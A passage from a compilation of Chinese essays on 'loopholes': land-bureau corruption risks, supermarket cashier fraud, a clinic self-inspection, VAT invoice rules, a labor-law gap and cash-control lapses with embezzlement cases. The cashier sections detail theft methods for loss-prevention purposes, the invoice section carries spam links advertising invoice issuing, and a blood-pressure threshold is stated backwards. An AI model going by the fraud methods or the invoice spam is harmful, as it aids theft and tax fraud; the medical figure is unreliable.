我局围绕《国土资源系统反腐倡廉制度建设年活动实施方案》的要求,通过多种形式、多种渠道、广泛征求机关内部、人大代表、服务对象等方面对我单位工作重点领域的建议和意见,并进行梳理,主要是在用人权、审批(预审)权、处罚权、监督权等方面腐败现象和不正之风易发多发,主要表现在:
1、领导岗位\"三重一大\"即重大事项决策、重要人事任免、重大项目安排和大额资金使用及分管工作等方面存在的廉政和履职风险及问题,产生权力的关键点;
2、用人机制不够健全,工作岗位缺乏流动性,重要岗位长期由同一人任职,极易造成各种问题的发生,产生权力的关键点;
3、利用土地利用总体规划调整,为用地单位将土地调整为其期望状态,产生权力运行风险点;
4、土地审批(预审)过程中,从中捞取不义之财,产生权力运行风险点;
5、是用地单位不按规定缴纳相关费用,不履行追缴义务,造成国有资产流失,产生权力运行风险点;
6、是土地执法环节中,在测量违法用地面积上,随意减少违法用地面积,产生权力运行风险点;
7、是违法用地处罚自由裁量权的行使,随意性大,产生权力运行风险点;
8、征地补偿环节中,对补偿费的发放监督不力,产生权力运行风险点。
二、统筹安排,查找权力运行制度漏洞
权力运行制度漏洞查找坚持清理与审查相结合。对反腐倡廉23项制度进行了全面清理和审查,重点围绕\"两权\"运行和领导干部廉洁从政相关制度进行清理审查,按照\"分权制衡、监督制约、公开透明\",提出\"立、改、废\"意见,对不适应工作需要的制度进行修订和完善,对过于原则、不便操作的进一步细化,下一步将对《**区国土资源局重大事项民主决策制度》、《**区国土资源局集体会审制度》、、《**区国土资源局会议、学习制度》、《国土资源局过错责任追究制度》进行完善、修改;对《**区国土资源局诫勉谈制度》、《国土资源局过错责任追究制度》、《**区国土资源局干部轮岗制度》进行细化;建立《征地拆迁违法违规行为责任追究办法》、《\"三重一大\"议事规则》2项制度。
三、发生权力运行关键点、风险点的原因分析
国土资源管理领域发生权力运行关键点、风险点的原因是:
1、个别人思想不够端正。表现在忽视政治学习,放松世界观的改造,法制观念淡薄,责任意识差;对事情擅自处理,玩忽职守;思想观念转变不到位,办事效率低下,不给好处不办事,给了好处乱办事;
2、管理体制不够完善,系统内部管理机制、监督机制不健全,缺乏行之有效的监管手段;
3、监督机制不够到位,监督监察工作不规范,在思想认识上有偏差,存有消极抵触情绪,认为上级监督是\"不信任\"、群众监督是\"找茬子\",\"同级监督是不团结\";
4、用人机制不够健全,工作岗位缺乏流动性,某些重要岗位长期由同一人任职,有些工作从开始准备到最后验收都是相对固定的一批人,极易造成各种问题的发生。
四、健全制度体系,规范工作行为
针对查找出的权力关键点、权力运行的风险点、权力运行的制度漏洞,加强对重点人员和重要环节的制度建立、健全、完善、创新,形成用制度规范行为、按制度办事、靠制度管人的有效机制。
(一)建立健全运行类制度体系,规范工作管理。一是完善领导干部廉洁从政制度。修订、完善了党组议事规则和局长办公会议制度、廉政谈话、述职述廉、民主评议等制度规定,防止权力失控、行为失范、决策失误。凡\"三重一大\"事项坚持集体领导、民主集中、个别酝酿、会议决定,推行主办部门辅助决策、\"一把手\"末位发言制,确保决策民主、科学。二是完善土地执法管理制度。制订、完善了执法人员工作制度实施意见,推行重大涉土事项集体审批和重大案件集体审议制,加强对土地执法行为的考核监控和制约,不断完善执法事前监督和事中监督,进一步规范了行政收费和行政处罚,减少工作人员的自由裁量权,有效缩减办事程序,用制度规范工作行为。三是完善行政管理制度。制定实施后备干部管理办法、财务管理办法,大宗物品采购监督制约办法。人事管理上实行竞争制、交流制、任期制,建立起透明、合理的人、财、物管理制度体系。
(二)建立健全责任类制度体系,推动工作开展。一是完善党风廉政建设责任制。通过对党风廉政建设任务进行分解,签订党风廉政建设责任书等形式,构建党组(领导班子)负全面责任,\"一把手\"负总责,分管领导分工负责,部门\"一岗两责\"的责任机制,进一步明确了工作任务、责任部门、责任人和完成时限等。二是完善国土资源服务责任制。全面推行服务承诺制、首问负责制、延时服务制、预约服务制等工作制度,以制度规范服务项目、内容,严明工作纪律,强化服务责任。
(三)建立健全追究类工作体系,促进工作落实。一是修订完善综合考核办法。推行综合考核,涵盖全面,量化标准,综合运用。将制度落实情况、职责履行情况、工作开展情况等纳入综合考核范围。二是开展党风廉政责任制考核。建立完善了党风廉政建设责任考核追究办法,丰富考核内容,完善考核方法,综合运用述职述廉、民主生活会、廉政谈话、效能监察等方式,定期考核与年终考核相结合、评议与测评相结合,对不落实、落实不到位的严格按规定追究责任。三是完善执法过错追究制。对执法过错追究办法进行修订完善,对发生过错的及时追究责任。
第15篇:超市收银漏洞及解决方法
超市收银漏洞及解决方法
商场超市收银漏洞,有时候就是收银员的损公肥私行为。一般而言,商场超市收银漏洞会有四种常见方式。本文将对常见的三四种商场超市收银漏洞方式进行简单的分析。
第一种常见的商场超市收银漏洞方式:漏扫商品
这是最常见的情况了,但漏扫商品仅有不超过5%的部分进入个人腰包。毕竟这个行业人员的流动性大,而且收银工作近于枯燥无聊,不少新员工和有点油了的老员工、注意力不集中的员工,都有可能出现漏扫商品的现象,因为是漏扫,只要顾客付款金额与电脑显示的金额一致,就绝对不会出现此单的长短款,只是漏扫的这部分商品不明不白地流失了。另一种情况就是故意漏扫了,那样的情况下收银员得在事后想法转移余款,因为这时她比哪个都明白电脑那里显示的长短款可是要自己掏钱的。
第二种常见的商场超市收银漏洞方式:高价低入
某日有点闲情,调平时很少看的收银数据看一下,发现一个很特别的商品名称及数据,显示玩具a,7 元,伴随那单销售记录的还有一床电热毯(那可是南方的6月份啊)。当时纳闷,咋还有如此名称的商品资料没有清理,转而问电脑部主管,玩具a是什么东西,答复居然是开业一年后的时候对玩具做过一次清场处理的,属当时编的均价码,后来一直没有人管它至少有两年没用了,便不得不西服那些专心钻研“学问”的收银员了,这么远的历史都能研究出来。迅速调出对应那台收银机的录像,录像里显示那顾客买了两个单价为35元一个的玩具、一个砧板、一把菜刀、外加一堆其他商品,刚才说了玩具是有那玩具a的记录的,砧板菜刀是没记录,至少电热毯也没见着了,初步估算全单应收为不低于250元,可那单实收才118元啊,光玩具一项就不见了63元了。因为不少是手输码的,防损员也只能说看到每一个好像收银员都有拿在手里输过了,也给了不少钱的,其他的全推不知道了。
第三种常见的商场超市收银漏洞方式:偷梁换柱
这类事件在非食品特别是家杂区最甚,各位看看你们家杂区的商品命名,几乎同名或是雷同的商品应该不少吧,拿上一堆标价签或是名称,随便抓一个不是很熟悉那个区域的员工去问一下,看一下有几个能知道是什么东西,能不能名品和商品形成印象中的关连。再拿个简单的类别吧,看一下针织类的毛巾系列,拿一堆商品过来,相信没有几个人能说出哪种多少钱,哪种贵点,连基本的印象都没有,难道你还能要求区域的员工对每一件有顾客需要的商品全跟要收银台去确认一次,看着人家买完单?其他的如砧板、菜刀、杯子等家杂商品就更加了,将高价商品按另一个低价同类商品的店内码入电脑收银。
第四种常见的商场超市收银漏洞方式:频繁取消
这个方法算上点高智商的了,也是最难发现的,将作重点讲述。频繁取消顾客所购物商品,在前一个顾客大额买单没要电脑小票的空档,将此单挂起,再随便打个如捧捧糖之类小商品,直接点收银,当着你的监控摄像头将小票取下来撕掉丢垃圾筒。不管是录像还是防损或别人,乍一看去,她是打了小票出来的,只是顾客没要,于是撕了丢垃圾筒了。请注意,在顾客离开后,虽然用小商品出票了,但前一单仍处于挂单状态,她再调出来,对部分商品进行取消操作(当然有的如果有全单取消的权限也许会被全单取消掉了),最后才按收银结帐,这样她便能迅速地算出钱箱里有多少钱是自己的了,找个机会拿出来即可
第16篇:超市收银漏洞如何监管
超市收银漏洞如何监管
收银漏洞说白了就是收银员有这样那样的损公肥私(包括家人)行为,将本不属于自己的钱据为己有,超市方却又无法做到真正的控制。收银漏洞这样的行为放任下去,必将导致此超市内盗成风,所有有利益关系的人捆成一团,遗患无穷。这不是危言耸听,我是亲眼见到过的了。内盗者越做越大胆,不少员工不满足于盗窃商品,与收银员直接用人民币分赃操作,结果一个才几十人的超市,不少分收入大过店长或经理了,这时候你千万别以为日结的时候长短款会同个人赔就了事哦。好了,转入正题,下面就收银漏洞的几种常见方式略作分析:
收银漏洞方式一:漏扫商品 这是最常见的情况了,但漏扫商品仅有不超过5%的部分进入个人腰包。毕竟这个行业人员的流动性大,而且收银工作近于枯燥无聊,不少新员工和有点油了的老员工、注意力不集中的员工,都有可能出现漏扫商品的现象,因为是漏扫,只要顾客付款金额与电脑显示的金额一致,就绝对不会出现此单的长短款,只是漏扫的这部分商品不明不白地流失了。这样的流失,如果出现在实行月度盘点的超市,那我们的主管和部门员工一起来赔偿就有点冤了,当然,这并不能说出口处有防损员就以为万事不管的,你去看一下那不少超市守出口的防损岗位,基本上只是机械地收票盖下章(或划个记号)就了事,不信你去自己超市的出口防损岗位,看到他收票放顾客出门看只要问一下刚才的顾客买了多少样东西,看看有没有人能说出来就知道了,所以防损工作不只是防损员的事。另一种情况就是故意漏扫了,那样的情况下收银员得在事后想法转移余款,因为这时她比哪个都明白电脑那里显示的长短款可是要自己掏钱的。举个最简单的例子,红牛5元一听,一个顾客买了20听共100元,她收人家100元,可输数量的时候只打进去18听,另10元不就没了吗?别以为顾客都会来查,因为这样的收银员不会傻到扫一听商品而去输个数量20的,小票上一定会显示至少5条商品信息,让人没空去对(对老太太一定不敢这样的),这样的情况一般都是从家人开始的,一家人少付点钱嘛。一个5口之家一天的伙食开支居然都能花不到10元搞定啊,还不少鱼和肉的呢。
收银漏洞方式二:高价低入 某日有点闲情,调平时很少看的收银数据看一下,发现一个很特别的商品名称及数据,显示玩具a,7 元,伴随那单销售记录的还有一床电热毯(那可是南方的6月份啊)。当时纳闷,咋还有如此名称的商品资料没有清理,转而问电脑部主管,玩具a是什么东西,答复居然是开业一年后的时候对玩具做过一次清场处理的,属当时
1 编的均价码,后来一直没有人管它至少有两年没用了,便不得不西服那些专心钻研“学问”的收银员了,这么远的历史都能研究出来。迅速调出对应那台收银机的录像,录像里显示那顾客买了两个单价为35元一个的玩具、一个砧板、一把菜刀、外加一堆其他商品,刚才说了玩具是有那玩具a的记录的,砧板菜刀是没记录,至少电热毯也没见着了,初步估算全单应收为不低于250元,可那单实收才118元啊,光玩具一项就不见了63元了。因为不少是手输码的,防损员也只能说看到每一个好像收银员都有拿在手里输过了,也给了不少钱的,其他的全推不知道了。这一单够晕的了,当然按事实做处理了,那些没这样查出来的呢(要知道查数据的工程量不小哦),够不少老板们吓的了,此情况暂列第二了。
收银漏洞方式三:偷梁换柱 这类事件在非食品特别是家杂区最甚,各位看看你们家杂区的商品命名,几乎同名或是雷同的商品应该不少吧,拿上一堆标价签或是名称,随便抓一个不是很熟悉那个区域的员工去问一下,看一下有几个能知道是什么东西,能不能名品和商品形成印象中的关连。再拿个简单的类别吧,看一下针织类的毛巾系列,拿一堆商品过来,相信没有几个人能说出哪种多少钱,哪种贵点,连基本的印象都没有,难道你还能要求区域的员工对每一件有顾客需要的商品全跟要收银台去确认一次,看着人家买完单?其他的如砧板、菜刀、杯子等家杂商品就更加了,将高价商品按另一个低价同类商品的店内码入电脑收银,一件差价就让你吓一跳了。那时你才会惊呼,原来以为容易被调换的其他商品如牙膏早就属小儿科的把戏了。
收银漏洞方式四:频繁取消 这个方法算上点高智商的了,也是最难发现的,将作重点讲述。频繁取消顾客所购物商品,在前一个顾客大额买单没要电脑小票的空档,将此单挂起,再随便打个如捧捧糖之类小商品,直接点收银,当着你的监控摄像头将小票取下来撕掉丢垃圾筒。不管是录像还是防损或别人,乍一看去,她是打了小票出来的,只是顾客没要,于是撕了丢垃圾筒了。请注意,在顾客离开后,虽然用小商品出票了,但前一单仍处于挂单状态,她再调出来,对部分商品进行取消操作(当然有的如果有全单取消的权限也许会被全单取消掉了),最后才按收银结帐,这样她便能迅速地算出钱箱里有多少钱是自己的了,找个机会拿出来即可。
第17篇:半年工作检查漏洞与不足
2014年上半年工作检查自查报告
半年来我院公共卫生工作完成基本良好,所有的资料工作完成较好,但是在一些细节上未能符合国家管理要求,在此,现将2014年上半年工作的不足要点作出要求和补充。现就不足之处作一下提示,希望在下半年的工作中做到更完美,迎接全年年终检查。
一、慢性病工作。
1、高血压管理
(1)高血压随访表的完善,对外出的高血压患者要加以说明,是否随访到位;
(2)对转诊到上级医院的患者要在两周之内再随访一次,目的是了解患者的血压控制情况;
(3)血压控制要求,对于血压控制不满意的患者,一定要使其血压控制在安全范围内,如:舒张压在160以上,收缩压在大于100的患者要加以控制调理,建议换药、加剂量、转诊就医等; (4)随访的填写时间不能太一致; (5)药物的剂量填写要规律;
(6)对随访表上的填写体重一年中不能一个数字,心率也不能一个数字。
2、糖尿病
(1)糖尿病的填写规律; (2)药物剂量的要求要规律; (3)空腹和餐后血糖的填写要真实; (4)随访表的完善,对外出的糖尿病患者要加以说明,是否随访到位;
(5)对转诊到上级医院的患者要在两周之内再随访一次,目的是了解患者的血糖控制情况。
(6)对随访表上的填写体重一年中不能一个数字,心率也不能一个数字。
3、重性精神病
(1)时常了解精神病患者的生活情况和动向情况。
(2)对经常肇事的精神病患者要及时和监护人配合加以管制,如不能管制的应以书面形式即时报告当地派出所。
二、健康教育
1、健康教育宣传栏
(1)对上级部门发放的健康教育宣传栏要即时领取并张贴到位,并取下图片以作备份取证。 (2)健康教育的更新要即时。
(3)健康教育宣传栏的张贴位置要明显。
2、健康教育知识讲座
(1)健康教育知识讲座的内容要真实,对健康教育的内容要符合讲座对象的实际情况;
(2)每两月一期的健康教育讲座要即时更新。
三、老年人管理
1、对辖区的老年人每年一次的体检。
2、要对老年人进行每年一次的生活能力评估。
3、时常询问老年人的生活情况。
四、系统录入
对每一季度的慢病随访要即时的录入,录入的内容要和实际资料相实,对所在辖区的实际情况要即时了解,需要上报卫生院的即时上报。
镇卫生院
2014年7月5日
第18篇:堵塞运输发票抵扣漏洞
http:///guangzhoufapiao/
针对利用虚开运输发票抵扣增值税的不良现象,离石区国税局将在今年大力加强运输发票的管理力度,努力解决运输发票审核难、监控难、评查难的问题,从而进一步提升税源管理水平,堵塞偷税漏洞。
一是加大审核力度。对企业取得货物运输发票的票面信息及发票的合理性、配比性进行逐一审核,从中筛选出物件不符、数量有误、金额偏高等疑点发票及其使用企业。二是加强纳税评估。将疑点运输发票转入评估程序,评估企业发出货物数量与运输货物发票所填数量是否一致,所购货物的品种与运输方式是否匹配,运费的付款方与开票方是否一致等,并初步确定各类运输发票基本数据的合理值。三是开展监控核查。对企业运输发票的金额和数量进行严格监控,要求超额企业提供货物运输合同,协议,车辆运输明细账等以备对其真实性进行核查,并不定期开展运输发票专项抽查行动。
但是,一般纳税人有下列情形之一者,不得领购使用专用发票:会计核算不健全,即不能按会计制度和财税机关的要求准确核算增值税的销项税额、进项税额和应纳税额者;不能向财税机关准确提供增值税销项税额、进项税额、应纳税额数据及其他有关增值税财税资料者,上述其他有关增值税财税资料的内容,由北京代开发票管理总局直属分局确定;在专用发票的领购、使用、保管等方面有违反规定的行为,经财税机关责令限期改正而仍未改正者,如出现私自印制专用发票、向个人或财税机关以外的单位买取专用发票、借用他人专用发票、向他人提供专用发票、未按规定的要求开具专用发票、未按规定保管专用发票、未按规定申报专用发票的购用存情况、未按规定接受财税机关检查等情况;销售的货物全部属于免税项目者。有上列情形的一般纳税人如已领购使用专用发票,财税机关应收缴其结存的专用发票。上述项目收款时应该开具,普通发票。商业企业零售烟、酒、食品、服装、鞋帽、化妆品等消费品不可以开具增值税票样展示,但劳保专用的鞋帽除外。
增值税纳税人使用的普通发票主要有:工业企业产品销售统一发票、工业企业材料销售统一发票、工业企业加工产品统一发票、工业加工修理统一发票、商业零售统一发票、商业批发统一发票、农林牧水产品收购统一发票、废旧物资收购发票、机动车专项修理专用发票、电业局电力销售专用发票、自来水公司水销售专用发票、公共事业联合收费处专用发票、临时经营发票等。
对企业作废、重新开具、申请开具红字增值税专用发票的具体情形,《国家税务总局关于修订的通知》(国税发[2006]156号)、《国家税务总局关于修订增值税专用发票使用规定的补充通知》(国税发[2007]18号)和国家税务总局《关于纳税人折扣折让行为开具红字增值税专用发票问题的通知》(国税函[2006]1279号)三个文件有明确的规定,笔者归纳如下:
一、应当作废的情形
一般纳税人在开具专用发票当月,发生销货退回、开票有误等情形,收到退回的发票联、抵扣联符合作废条件的,按作废处理;开具时发现有误的,可即时作废。
http:///guangzhoufapiao/
同时具有下列情形的,为本规定所称作废条件:
(一)收到退回的发票联、抵扣联时间未超过销售方开票当月;
(二)销售方未抄税并且未记账;
(三)购买方未认证或者认证结果为“纳税人识别号认证不符”、“专用发票代码、号码认证不符”。
本规定所称抄税,是报税前用IC卡或者IC卡和软盘抄取开票数据电文。
本规定所称认证,是税务机关通过防伪税控系统对专用发票所列数据的识别、确认。
二、重新开具情形
增值税专用发票经认证,有下列情形之一的,不得作为增值税进项税额的抵扣凭证,税务机关退还原件,购买方可要求销售方重新开具专用发票。
(一)无法认证。
本规定所称无法认证,是指专用发票所列密文或者明文不能辨认,无法产生认证结果。
(二)纳税人识别号认证不符。
本规定所称纳税人识别号认证不符,是指专用发票所列购买方纳税人识别号有误。
(三)专用发票代码、号码认证不符。
本规定所称专用发票代码、号码认证不符,是指专用发票所列密文解译后与明文的代码或者号码不一致。
三、开具红字增值税专用发票的情形
红字增值税专用发票数据是销售方申报应税货物销售额和销项税额的抵减依据,企业在什么情况下可以申请开具红字专用发票以及如何开具红字专用发票?
(一)可以申请开具红字专用发票的情形
1、一般纳税人取得专用发票后,发生销货退回、开票有误等情形但不符合作废条件的,或者因销货部分退回及发生销售折让的,购买方应向主管税务机关填报《开具红字增值税专用发票申请单》。主管税务机关对一般纳税人填报的《申请单》进行审核后,出具《开具红字增值税专用发票通知单》,《通知单》应与《申请单》一一对应。销售方凭购买方提供的《通知单》开具红字专用发票,在防伪税控系统中以销项负数开具。红字专用发票应与《通知单》一一对应。
2、纳税人销售货物并向购买方开具增值税专用发票后,由于购货方在一定时期内累计购买货物达到一定数量,或者由于市场价格下降等原因,销货方给予购货方相应的价格优惠或补偿等折扣、折让行为,销货方可按现行《增值税专用发票使用规定》的有关规定开具红字增值税专用发票。
3、税务机关为小规模纳税人代开专用发票需要开具红字专用发票的,比照一般纳税人开具红字专用发票的处理办法,通知单第二联交代开税务机关。
(二)视不同情况分别按以下办法处理:
1、因专用发票抵扣联、发票联均无法认证的,由购买方填报《开具红字增值税专用发票申请单》(以下简称申请单),并在申请单上填写具体原因以及相对应蓝字专用发票的信息,主管税务机关审核后出具《开具红字增值税专用发票通知单》(以下简称通知单)。购买方不作进项税额转出处理。
2、购买方所购货物不属于增值税扣税项目范围,取得的专用发票未经认证的,由购买方填报申请单,并在申请单上填写具体原因以及相对应蓝字专用发票的信息,主管税务机关审核后出具通知单。购买方不作进项税额转出处理。
3、因开票有误购买方拒收专用发票的,销售方须在专用发票认证期限内向主管税务机关填报申请单,并在申请单上填写具体原因以及相对应蓝字专用发票的信息,同时提供由购买方出具的写明拒收理由、错误具体项目以及正确内容的书面材料,主管税务机关审核确认后出具通知单。销售方凭通知单开具红字专用发票。
4、因开票有误等原因尚未将专用发票交付购买方的,销售方须在开具有误专用发票的次月内向主管税务机关填报申请单,并在申请单上填写具体原因以及相对应蓝字专用发票的信息,同时提供由销售方出具的写明具体理由、错误具体项目以及正确内容的书面材料,主管税务机关审核确认后出具通知单。销售方凭通知单开具红字专用发票。
5、发生销货退回或销售折让的,除按照《通知》的规定进行处理外,销售方还应在开具红字专用发票后将该笔业务的相应记账凭证复印件报送主管税务机关备案。
发票缴销管理,就是财税机关利用票单位、用票个人,对已用发票、作废发票等进行核实销号而开展的各项活动,包括办理缴销手续、进行票面审查、票据销号等内容。它是最新动态的最后一道程序,在很大程度上对发票的保管、领购和使用情况起着综合反映的作用。搞好这一环节的监督控制,对于加强最新动态工作有着重要的作用。根据《北京代开发票管理办法》,开具发票的单位和个人应当按照财税机关的规定。
转载请注明出处: http:///北京开发票开北京发票建筑发票
第19篇:劳动合同法的一大漏洞
劳动合同法的一大漏洞
劳动合同法的一大漏洞
劳动合同法以固定期限劳动合同终止需支付经济补偿、签订两次固定期限劳动合同后需签订无固定期限劳动合同等手段来规制目前大量存在的短期劳动合同现象,以法律的手段引导用人单位签订长期的劳动合同或无固定期限劳动合同,无疑,这是很值得称道的。
劳动合同法第12条规定:劳动合同分为固定期限劳动合同、无固定期限劳动合同和以完成一定工作任务为期限的劳动合同。以完成一定工作任务为期限的劳动合同,是指用人单位与劳动者约定以某项工作的完成为合同期限的劳动合同。用人单位与劳动者协商一致,可以订立以完成一定工作任务为期限的劳动合同。
经过研究劳动合同法条文,我注意到劳动合同法好像冷落了\"以完成一定工作任务为期限的劳动合同\"这个合同形式,劳动合同法中仅有三条涉及到了以完成一定工作任务为期限的劳动合同,即第12条,规定了劳动合同的三个分类,第15条,对以完成一定工作任务为期限的劳动合同的定义,第19条第3款,规定以完成一定工作任务为期限的劳动合同不得约定试用期。
劳动合同法第14条规定了三种情况下劳动者提出或者同意续订、订立劳动合同的,除劳动者提出订立固定期限劳动合同外,应当订立无固定期限劳动合同:即
(一)劳动者在该用人单位连续工作满十年的;
(二)用人单位初次实行劳动合同制度或者国有企业改制重新订立劳动合同时,劳动者在该用人单位连续工作满十年且距法定退休年龄不足十年的;
(三)连续订立二次固定期限劳动合同,且劳动者没有本法第三十九条和第四十条第一项、第二项规定的情形,续订劳动合同的。该条没有对\"以完成一定工作任务为期限的劳动合同\"作出任何规定,由此可得出结论,签订\"以完成一定工作任务为期限的劳动合同\"无需担心劳动者提出要求订立无固定期限劳动合同。
劳动合同法第46条规定:有下列情形之一的,用人单位应当向劳动者支付经济补偿:
(一)劳动者依照本法第三十八条规定解除劳动合同的;
(二)用人单位依照本法第三十六条规定向劳动者提出解除劳动合同并与劳动者协商一致解除劳动合同的;
(三)用人单位依照本法第四十条规定解除劳动合同的;
(四)用人单位依照本法第四十一条第一款规定解除劳动合同的;
(五)除用人单位维持或者提高劳动合同约定条件续订劳动合同,劳动者不同意续订的情形外,依照本法第四十四条第一项规定终止固定期限劳动合同的;
(六)依照本法第四十四条第四项、第五项规定终止劳动合同的;
(七)法律、行政法规规定的其他情形。其中第
(五)明确了劳动合同终止需支付经济补偿仅适用于固定期限劳动合同,排除了以完成一定工作任务为期限的劳动合同。
劳动合同法历经二年修改,先后三四次审议,最终出台,两个最值得骄傲的亮点就是无固定期限劳动合同的签订和合同期满终止需支付经济补偿,但是,这两个亮点都将\"以完成一定工作任务为期限的劳动合同\"的适用排除在外,用人单位如果与劳动者签订\"以完成一定工作任务为期限的劳动合同\",不仅仅合同终止无需支付经济补偿,更不用担心劳动者要求签订无固定期限劳动合同,估计大量的用人单位因此会投机取巧,招聘新员工时采用\"以完成一定工作任务为期限的劳动合同\",这时候劳动合同法的光辉将无法普照,这不能不说是劳动合同法的一大漏洞。
第20篇:资金管理六大内控漏洞
资金管理六大内控漏洞之一
货币资金是企业资产的重要组成部分,在企业的各项经济活动中起到了非常重要的作用,持有足够的货币资金是企业运行的基本条件。
对资金营运管控来说,面临的主要风险包括:资金活动管控不严,可能导致资金被挪用、侵占、抽逃或遭受欺诈;资金调度不合理、营运不畅,可能导致企业陷入财务困境或资金冗余。
营运资金管控整体目标可归纳为以下四点:
1、货币资金的安全性。通过良好的内部控制,确保企业资金安全,预防被盗窃、诈骗和挪用。
2、货币资金的完整性。确保企业收到的货币全部入账,预防私设“小金库”等侵占企业收入的违法行为。
3、货币资金的合法性。货币资金取得、使用符合国家财经法规要求,手续齐备。
4、货币资金的效益性。通过合理调度货币资金,在满足企业营运需求基础上,发挥资金的最大效益。
在建立和实施货币资金内部控制制度中,至少应当强化以下方面的关键控制措施:
1、职责分工、权限范围和审批程序应当明确,机构设置和人员配备应当科学合理;
2、现金、银行存款的管理应当符合法律要求,银行账户的开立、审批、核对、清理应当严格有效,现金盘点和银行对账单的核对应当按规定严格执行;
3、与货币资金有关的票据的购买、保管、使用、销毁等应当有完整的记录,银行预留印鉴和有关印章的管理应当严格有效。
货币资金是流动性最强、控制风险最高的资产,企事业单位的货币资金遭挪用、贪污和诈骗等案例可以说屡见报端,而这些案例的发生往往与单位货币资金存在内控漏洞直接相关。
典型漏洞一:资金管理职责分配违背不相容职责分离要求
资金管理涉及到资金收入、支出、审批、保管、记录、对账、盘点等诸多职责,稍不注意,可能会导致同一人兼任不相容职责,给资金安全带来隐患。
资金管理职责分配的内控漏洞通常有:出纳领取银行对账单、出纳负责银行对账、同一人保管所有支付印鉴、印鉴和票据由同一人保管、多个网银U盾由同一人保管、网上银行业务交易的执行与审核授权由同一人操作、负责收款的人兼任会计记录、负责收款的人同时负责核对收款、出纳兼任收付款凭证制单、缺乏独立于保管职责(如现金、票据、印鉴)的人员对资金保管情况进行监督等。
资金管理这方面内控漏洞往往会直接影响到资金安全或资金数据准确性,导致资金挪用、贪污或设立账外“小金库”等行为。特别要提醒注意的是,就是出纳人员领取银行对账单这个问题,从媒体曝光的大量出纳人员挪用资金案例中,都可以看到出纳利用领取银行对账单机会,伪造银行对账单,掩盖资金舞弊。
究其原因,企业主要从工作方便角度出发,由于出纳经常跑银行,办理各种收付款,于是便“顺理成章”地领取银行对账单、编制银行余额调节表。殊不知这种习惯做法存在巨大风险隐患,其实要防范这种风险并不难,只要改由出纳以外的人来负责银行对账单领取和账面银行存款余额核实工作即可,关键是要从思想意识上重视起来。目前不少银行定期寄送对账单给企业会计主管,并要求企业签字盖章返回对账回执,但如果这项工作仍交给出纳来做,那可能导致风险未得到防范。此外,对于伪造银行对账单舞弊,企业可考虑纸质对账单以外,通过网上银行核实银行存款余额。
【案例】国家自然科学基金委会计人员卞中,在1995年到2003年的八年期间里,利用掌管国家基础科学研究的专项资金下拨权,采用谎称支票作废、偷盖印鉴、削减拨款金额、伪造银行进账单和信汇凭证、编造银行对账单等手段贪污、挪用公款人民币两亿余元。卞中担负着资金收付的出纳职能,同时所有的银行单据和银行对账单也都由他一手经办,使得他得以作案长达八年都没有引起过怀疑。2003年春节刚过,基金委财务局经费管理处刚来的一名大学生上班伊始便到定点银行拿对账单,以往这一工作由会计卞中负责。一笔金额为2090万的支出引起了这名大学生注意,在其印象里他没有听说此项开支。这个初入社会的大学生找到卞中刨根问底,这桩涉案金额超过2亿元的大案也因此浮出水面。
据办案人员介绍:“作为入账凭证,每一笔资金的流向都体现在银行的对账单上,而在基金委,卞某既管记账又管拨款,身份是会计却又掌握出纳的职能,这样就给他实施贪污挪用提供了职务上的便利。比如说他挪出去3000万或者1980万,他把真对账单拿下来自己留下以后,在假对账单里,这笔钱他自己做得根本不体现出来。” “咱们银行对账单,都是从电脑打出来的,既然是电脑做的,卞某也有电脑,他也可以按照那种纸张和程序往下打。”打印出对账单后还必须要加盖银行印章,卞某长期和银行打交道,与银行工作人员之间非常熟悉,有时候银行直接就把印章给他,让他自己盖,这时候卞某就可以一次盖很多。
漏洞识别:梳理资金管理尤其是财务部门职责分配情况,检查职责分配存在不相容职务未分离现象。同时,关注和检查岗位人员休假、出差或离开情况下,职务如何交接,在岗位人员发生临时变动情况下,是否符合不相容职务分离原则
典型漏洞二:银行账户管理存在缺失
银行账户管理方面的内控漏洞通常有:银行账户的开立和撤销缺乏必要的授权批准程序;私自设立、变更或撤销银行账户;违反公司规定出租出借银行账户;公司以个人名义开户,公款私存;银行账户设立及使用不符合法规规定;银行账户开立数量过多;长期不用或失效的银行账户未及时办理销户;未建立银行账户统一台账。
银行账户管理缺失,可能威胁资金安全、降低资金效率或违规遭到外部处罚,企业可从几方面加强控制:
1、严格银行账户开立程序。所有银行账户的开设应符合经营发展需要,不得随意开设,不得违反规定开立和使用银行账户。企业应明确规定银行账户开户条件、开户申请审批及办理程序,所有银行账户开立应由财务部门办理,填写银行开户申请,并经过公司高层审批(一般应由董事长或总经理审批),审批程序应留下书面痕迹并存档,对集团公司来说,应当严格限制下属子公司新开银行账户,下属公司开户应报集团审批或报集团公司备案。
2、财务部门应对于已开设未使用或长期不使用的账户及时做出销户处理。银行账户销户按规定操作,经过适当授权并正确反映在会计记录中。销户的银行存款应转入正在使用的银行账户中,并对存、销户凭证及时编制会计记录入账。对已销户的银行账户,应在办理销户后一个月再由经办人员以外的财务人员向银行核实销户情况,确保销户已得到执行。
3、做好银行账户开户/销户情况记录。企业建立银行账户台账,记录银行账户开户/销户情况,并定期与银行核对,确保所记录的银行账户与实际相符。
【案例】私开单位银行账户,财务科长贪挪上千万。2011年10月25日上午,京煤集团地质勘探队计财科原科长刘国斌和副科长周和生,因涉嫌贪污、挪用公款在市一中院出庭受审,涉案金额超过千万。起诉书显示,1998年
3、4月,两人擅自将公司账户中的300万公款转出,用于购买国债。随后,又将这笔资金转入两人私设的账户内,并将资金平账后非法占有;1998年
11、12月,两人又直接将公司的170万公款和60万公款转入私设账户并平账。此外,两人还于2000年12月,将公司的300万元公款转至某证券营业部,用于购买
债券。后二人将该笔资金转至私设账户内,并平账后非法占有。
此外,检察机关还单独指控刘国斌于1998年5月,将300万元公款转至朋友股票账户内,供其个人使用。后刘国斌将该笔资金平账,非法占有。指控刘国斌、周和生涉嫌挪用公款200万元。两人于1998年3月至9月,将200万元公款转至私设的十个账户内,存入三个月定期,并获取利息1.4万余元,随后两人将钱款归还。
在法庭上,刘国斌认可了全部指控,但他表示,这样做是为单位更好地发展。“1998年国家开始缩减事业单位的拨款”,刘国斌说,为了给单位存一笔钱,以备日后不时之需,才与周和生瞒着单位,私下在银行开设“小金库”。他说,公款并没有落到自己腰包,只是以单位的名义开设了账户,在平账之后将公款隐藏了起来。
刘国斌的律师说,刘国斌以单位名义开设账户,需要包括公司法定代表人身份证、财务章、单位开户证明等7项手续,刘国斌除了掌握其中的财务章外,其他都需要经过单位相关部门及领导,所以他不可能在单位毫不知情的情况下开设账户,转移大量资金并自行掌控资金出入。周和生对账户的开立、转账等问题的回答,与刘国斌描述相差无几,唯独一点与刘国斌不同的是,他一直称:“公司的钱太多了,有人让我们把钱藏起来。
